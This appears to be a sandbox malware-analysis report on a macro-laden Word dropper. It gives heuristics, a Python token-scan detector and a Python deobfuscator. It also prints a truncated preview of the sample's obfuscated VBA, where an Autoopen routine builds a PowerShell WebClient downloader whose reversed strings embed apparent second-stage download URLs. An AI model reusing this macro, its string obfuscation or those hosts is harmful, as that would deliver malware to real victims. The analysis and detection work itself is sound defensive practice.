Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
ClamAV identifies the sample as Doc.Dropper.Agent-6546023-0, and the static heuristics agree. olevba recovered the VBA project (macros.bas, 122605 bytes) with an AutoOpen entry point, spelled `Autoopen` in the source; VBA is case-insensitive, so Word runs it as soon as the document opens. A Shell() call is present in the project (the call itself falls outside the truncated preview below), and the compiled p-code stream carries the same auto-execution and execution tokens, so the verdict does not depend on the source extraction succeeding. The recovered code is padded with junk assignments and meaningless arithmetic. The arguments to the helper `LAdGp` are the interesting part: each literal is reversed and split with `'+'`, and the small integer arguments are hidden as `N + k - N`. Read backwards, fragments such as `t'+'n'+'ei'+'l'+'C'+'beW.t'+'eN.'+'me'+'t'+'syS` spell System.Net.WebClient, and `)'$',)021]rAHC[+76]rAHC[+67]rAHC[((eCAlpe` reads as a PowerShell `.replace(([CHAR]76+[CHAR]67+[CHAR]120),'$')`, which swaps the placeholder `LCx` back to `$`; a companion `[string][char]92` substitution restores backslashes. This is consistent with a dropper that assembles a PowerShell downloader at run time, presumably launches it through Shell(), and fetches and executes a second-stage payload. Two caveats for the analyst: the only URL extracted in plaintext is the benign OOXML DrawingML schema namespace, so any download locations live only inside the obfuscated strings, and the legacy WordBasic heuristic's statement that no modern VBA project was recovered conflicts with the successful olevba extraction; treat it as a second hit on the AutoOpen marker rather than independent evidence.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6546023-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6546023-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
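As an added illustration of the p-code heuristic listed above (OLE_VBA_PCODE_AUTOEXEC_EXEC), not the analyzer's own implementation: a token co-occurrence scan over raw stream bytes rather than decoded source. It still fires when olevba cannot recover a module, because procedure and identifier names remain in the compiled VBA/cache streams as plain ASCII or UTF-16LE text. The token lists are this example's own choice, and the three sample streams are constructed here; the first mirrors the Autoopen/Shell shape reported for this sample.

```python
"""Token co-occurrence scan in the spirit of OLE_VBA_PCODE_AUTOEXEC_EXEC.

Example written for this report, not the analyzer's implementation. It
scans raw stream bytes rather than decoded source, so it still fires when
olevba cannot recover a module (p-code-only / VBA-stomped documents), because
procedure and identifier names stay in the compiled VBA/cache streams as
plain ASCII or UTF-16LE text. Token lists are this example's own choice.
"""
import re

# Constructed streams, not carved from the sample. The first mirrors the
# Autoopen/Shell shape reported above (note the lowercase spelling: VBA is
# case-insensitive, so Word still runs it); the second stands in for a stream
# whose source is gone but whose UTF-16LE names remain; the third auto-runs
# without launching anything.
SOURCE_SAMPLE = b"Sub Autoopen()\r\n    On Error Resume Next\r\n    Shell cmd, vbHide\r\nEnd Sub\r\n"
PCODE_SAMPLE = (b"\x01\x00\x00\x00" + "Module1".encode("utf-16-le") + b"\x00\x00"
                + "AUTOOPEN".encode("utf-16-le") + b"\x00\x00"
                + "shell".encode("utf-16-le") + b"\x00")
BENIGN_SAMPLE = b'Sub AutoOpen()\r\n    MsgBox "Macro ran"\r\nEnd Sub\r\n'

AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "ShellExecute", "WScript.Shell", "CreateObject", "GetObject",
               "powershell", "URLDownloadToFile", "XMLHTTP", "Run")


def text_views(stream: bytes) -> list:
    """One byte-per-char view plus UTF-16LE views at both alignments."""
    views = [stream.decode("latin-1")]
    for offset in (0, 1):
        views.append(stream[offset:].decode("utf-16-le", errors="ignore"))
    return views


def find_tokens(stream: bytes, tokens) -> set:
    """Case-insensitive whole-identifier search; `Shell` must not match
    `ShellExecute` and `Run` must not match `Runtime`, so identifier
    boundaries are enforced on both sides."""
    hits = set()
    for view in text_views(stream):
        for tok in tokens:
            pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
            if re.search(pattern, view, re.I):
                hits.add(tok)
    return hits


def classify(stream: bytes):
    """Return (severity, autoexec hits, execution hits) for one stream."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    if auto and execs:
        return "high", auto, execs       # auto-run plus something that executes/downloads
    if auto:
        return "medium", auto, execs     # auto-run marker only, nothing launched
    return "info", auto, execs


if __name__ == "__main__":
    for name, blob in (("source", SOURCE_SAMPLE), ("pcode", PCODE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, classify(blob))
```

Run against the streams of a real document, feed each OLE stream (module streams, `_VBA_PROJECT`, `dir`) through `classify` separately; a "high" on any one of them is the analyst-facing signal the heuristic above describes, and the "medium" tier corresponds to an AutoOpen marker with nothing executable beside it.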
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 122605 bytes | fd704a2e8977b3579774d350d416eec2c691b3ad81afe6d2a4d79641147202ae |

Preview of the extracted script (first 1,000 lines; truncated below)
Attribute VB_Name = "sFzAdiwjaU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VACfHi(XjvRTq)
RcLNNW = IpjkR
HPNkPj = ciznbk
lYbkt = lhEAXb + Sgn(37661 - NLTuqC - ISLBjO + Fix(43348)) - 68381 - CDbl(59944)
ldBYj = 27084
End Sub
Sub rWuZKN(oPwPW)
slitdG = jJfPw
cmzRE = zVCTHB
FzMUQH = AfAvI + Sgn(90615 - wPirfb - karzul + Fix(48564)) - 17672 - CDbl(81483)
arfAQ = 43067
PHlYzl = JIAwF
ccZNV = VWWVn
oiUQPd = stbXqL + Sgn(75626 - pollaD - pwSSf + Fix(83899)) - 1922 - CDbl(36491)
lzhIDh = 87561
WQMaAE = Bhkjik
NoStWw = zqrail
iflIur = Jqwou + Sgn(67528 - zHUkI - kspJL + Fix(91072)) - 94684 - CDbl(48283)
UzSSpX = 5338
End Sub
Sub YnsWDz(FbPfA)
WpZkJl = bwzupj
wVctu = HwzQfj
TEjjSY = zJshjl + Sgn(26461 - bozjT - ZjzVlF + Fix(52792)) - 50108 - CDbl(85720)
FcqVX = 25029
cQtXm = uMIjkV
SwNTu = kKhTP
RicEv = AOVVQa + Sgn(8414 - FFIcYr - jrHOX + Fix(51266)) - 5041 - CDbl(55513)
vzdzV = 89982
End Sub
Sub Autoopen()
On Error Resume Next
INojH = whnOHO
BEuXTh = VpXSzl
ZTwER = mAOkH + Sgn(94665 - uZbITn - GqCGjn + Fix(6619)) - 94624 - CDbl(35523)
WlVZXO = 82267
chqciOaM (pDsBq + EHvWMSqvjSuF + QWkwv)
PwKnH = QqYiHp
YNWbXX = kwdkF
AsqKD = BEaXb + Sgn(65654 - owAlL - CTRwtu + Fix(25697)) - 48470 - CDbl(72044)
QVaiCi = 46277
End Sub
Sub NbAod(qutEjL)
MRnDlj = wPphPa
CBAQF = AXkvOp
FzBIp = tEDmf + Sgn(32599 - cDwlTY - oosto + Fix(56663)) - 72041 - CDbl(68484)
hsovPp = 93765
hrqhF = PVzGww
zbpmf = GITMo
QWtqV = mHkEbh + Sgn(41487 - qdYpWn - OiRwJk + Fix(47032)) - 81405 - CDbl(11003)
fCXpc = 42193
dXMpou = HRwbck
pAWBoc = LzNQiq
fzuNHt = zbzan + Sgn(32903 - sowNVk - BBnotn + Fix(34536)) - 46729 - CDbl(96679)
JEDcT = 3780
End Sub
Sub VqRqZ(bALAT)
QDJGG = wGZOFu
cYQjNO = mjsiS
bbMnim = NhVAzw + Sgn(95593 - vnGkX - wBLRz + Fix(73288)) - 89938 - CDbl(46545)
KioHCV = 87739
End Sub
Attribute VB_Name = "fTvNvCPlRQCq"
Sub ltujia(VkADp)
KWJou = CBbRb
Bwvjj = shlZk
XYurQv = sXvrt + Sgn(53573 - WBouKc - idcGp + Fix(7962)) - 60163 - CDbl(21412)
OllPR = 43497
End Sub
Function EHvWMSqvjSuF()
On Error Resume Next
Kkfwj = GGCEEz
srOIap = Slbrnh
hGHLK = uiJidj + Sgn(7687 - VDlzj - PWXcp + Fix(53194)) - 53399 - CDbl(76947)
JoLCO = 47849
jPhCb = pYZMl
INrWh = LKIaLA
bVNCr = VWSzFw + Sgn(21604 - qrVzYS - obDMRV + Fix(12525)) - 77329 - CDbl(89898)
Ejwzj = 53859
cXazqthY = LAdGp("TqNEf@Fr.)29]rAHC[]gNIrtS[,'n05'(eCAlper.)'$',)021]rAHC[+76]rAHC[+67]rAHC[((eCAlpe,", 29740 + 2 - 29740, 29740 + 75 - 29740)
iUQnq = mYWjV
ncnhH = uJqZWP
XoARNr = PzPDC + Sgn(18574 - MRovml - HhRzq + Fix(24404)) - 79596 - CDbl(34774)
IzBETb = 72745
spGwz = CwcHJY
csdOcQ = tzjZKz
CoBPJ = KlXQt + Sgn(11353 - AqKEnh - dmBdjh + Fix(70919)) - 51160 - CDbl(87056)
hlzXz = 19511
ElLLs = LAdGp("L4iYY'+'xC'+'L'+';'+'mod'+'na'+'r )T'+'MItT'+'MI+'+'T'+'M'+'I'+'cej'+'bo-'+'wT'+'M'+'I+TMIeT'+'MI+'+'TMInT'+'MI(& ='+' d'+'sadas'+'nxCL'( %Liu1", 13262 + 6 - 13262, 13262 + 135 - 13262)
rAMfrV = VWhcD
imcVkQ = Xicajs
jHHKB = iMnVzm + Sgn(33150 - IKzIXE - vJcniX + Fix(7546)) - 18304 - CDbl(45983)
wwEdNO = 44948
ijqRTP = cvWjM
XmYzLc = dwmUJu
YVowRI = aikwQ + Sgn(17938 - irPnP - NZQfj + Fix(38751)) - 82855 - CDbl(8803)
zVIZjt = 12978
UfSVdGHDsb = LAdGp("wF.D'+'d'+'as'+'n'+'xCL = BSNxCL;t'+'n'+'ei'+'l'+'C'+'beW.t'+'eN.'+'me'+'t'+'syS )TM'+'Itce'+'jbo-'+'TMI+'+'TMIw'+'TMI'+'+TMIenTMI(. '+'= Uv6", 52653 + 3 - 52653, 52653 + 135 - 52653)
aODKw = nAvTf
FWjtWV = FJPzRN
jOnqcK = loZLNQ + Sgn(34574 - ikALIj - oOCKuB + Fix(95002)) - 20669 - CDbl(33107)
zHaYNE = 82197
LBzUwn = XLWGcO
mtfojX = JYDFj
RcAGEw = MDvLF + Sgn(24138 - UkSQk - CcWSZN + Fix(38340)) - 83893 - CDbl(3836)
wOSGbu = 21759
wPDqw = LAdGp("Gddth@/K'+'MaBk'+'b'+'/ku.oc.llab'+'too'+'f'+'ts'+'a'+'e'+'/'+'/:'+'ptth'+'@/Nx5uV'+'s'+'2'+'/ed.skr'+'eid-e'+'//:s'+'ptth TMI = X'+'CDAx'+'C'+'L;)'+'33'+'1282 ,0'+'0001(tx'+'en.'+'ds'+'ad@vq", 39700 + 5 - 39
... (truncated)
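The string-building pattern in the preview above can be undone mechanically. The following is an added example written for this report, not analyzer code and not the sample's own logic: the two literals are copied verbatim from the `LAdGp()` calls in the listing, the small-integer arguments are recovered from their `N + k - N` form, and the result is sliced, stripped of its `'+'` separators and reversed. It assumes `LAdGp(literal, start, length)` behaves like VBA `Mid()`, which its argument shape suggests but the preview does not prove; the `IMT` to single-quote mapping is a further assumption, kept separate from the substitutions the sample's own `Replace()` chain defines.

```python
"""Decoding the string-builder pattern seen in the extracted macro source.

Example added for this report; it is not analyzer code and not the sample's
own logic. The two string literals are copied verbatim from the LAdGp()
calls in the preview above; everything else is modelled from what those
calls show. Assumption: LAdGp(literal, start, length) behaves like VBA
Mid(), since it takes a literal plus two small integers hidden as
`N + k - N` arithmetic.
"""
import re
from typing import Optional

# Copied from the preview (the Replace() chain and the WebClient fragment).
FRAGMENT_REPLACE = "TqNEf@Fr.)29]rAHC[]gNIrtS[,'n05'(eCAlper.)'$',)021]rAHC[+76]rAHC[+67]rAHC[((eCAlpe,"
FRAGMENT_WEBCLIENT = "wF.D'+'d'+'as'+'n'+'xCL = BSNxCL;t'+'n'+'ei'+'l'+'C'+'beW.t'+'eN.'+'me'+'t'+'syS )TM'+'Itce'+'jbo-'+'TMI+'+'TMIw'+'TMI'+'+TMIenTMI(. '+'= Uv6"

# Assumption, not evidenced by any Replace() visible in the preview: the IMT
# token stands for a single quote. Kept separate so the evidenced output can
# be checked on its own.
ASSUMED_SUBS = {"IMT": "'"}


def fold_arith(expr: str) -> int:
    """`29740 + 2 - 29740` -> 2: the sample hides small integer arguments this way."""
    m = re.fullmatch(r"\s*(\d+)\s*\+\s*(\d+)\s*-\s*(\d+)\s*", expr)
    if m is None:
        raise ValueError(f"unexpected argument form: {expr!r}")
    a, k, b = (int(g) for g in m.groups())
    return a + k - b


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, at most `length` characters."""
    if start < 1:
        raise ValueError("Mid start must be >= 1")
    return s[start - 1:start - 1 + length]


def decode_fragment(literal: str, start_expr: str, length_expr: str) -> str:
    """Model of LAdGp(): Mid()-style slice (assumed), drop the `'+'` chunk
    separators, then reverse the text to restore reading order."""
    sliced = vba_mid(literal, fold_arith(start_expr), fold_arith(length_expr))
    return sliced.replace("'+'", "")[::-1]


def extract_replace_map(decoded: str) -> dict:
    """Recover placeholder -> character pairs from the decoded PowerShell
    `.replace(([CHAR]a+[CHAR]b+...),'x')` and `.replace('tok',[string][char]N)` forms."""
    subs = {}
    for chars, target in re.findall(r"\(+((?:\[char\]\d+\+?)+)\),'([^']*)'\)", decoded, re.I):
        token = "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", chars, re.I))
        subs[token] = target
    for token, code in re.findall(r"\('([^']+)',\[string\]\[char\](\d+)\)", decoded, re.I):
        subs[token] = chr(int(code))
    return subs


def deobfuscate(assumed: Optional[dict] = None) -> str:
    """Decode the WebClient fragment and apply the substitutions the sample's
    own Replace() chain defines, plus any caller-supplied assumed mappings."""
    subs = extract_replace_map(decode_fragment(FRAGMENT_REPLACE, "29740 + 2 - 29740", "29740 + 75 - 29740"))
    subs.update(assumed or {})
    text = decode_fragment(FRAGMENT_WEBCLIENT, "52653 + 3 - 52653", "52653 + 135 - 52653")
    for token, replacement in subs.items():
        text = text.replace(token, replacement)
    return text


if __name__ == "__main__":
    print(extract_replace_map(decode_fragment(FRAGMENT_REPLACE, "29740 + 2 - 29740", "29740 + 75 - 29740")))
    print(deobfuscate())
    print(deobfuscate(ASSUMED_SUBS))
```

The evidenced substitutions alone already expose `System.Net.WebClient` and a `$`-prefixed variable assignment; with the assumed quote mapping the head of the fragment becomes `.('ne'+'w'+'-object') System.Net.WebClient`, the PowerShell call-operator idiom for invoking a cmdlet whose name is assembled at run time. To finish the job on the real sample, run `decode_fragment` over every `LAdGp()` call in the full macros.bas in source order and concatenate the results before applying the substitution map.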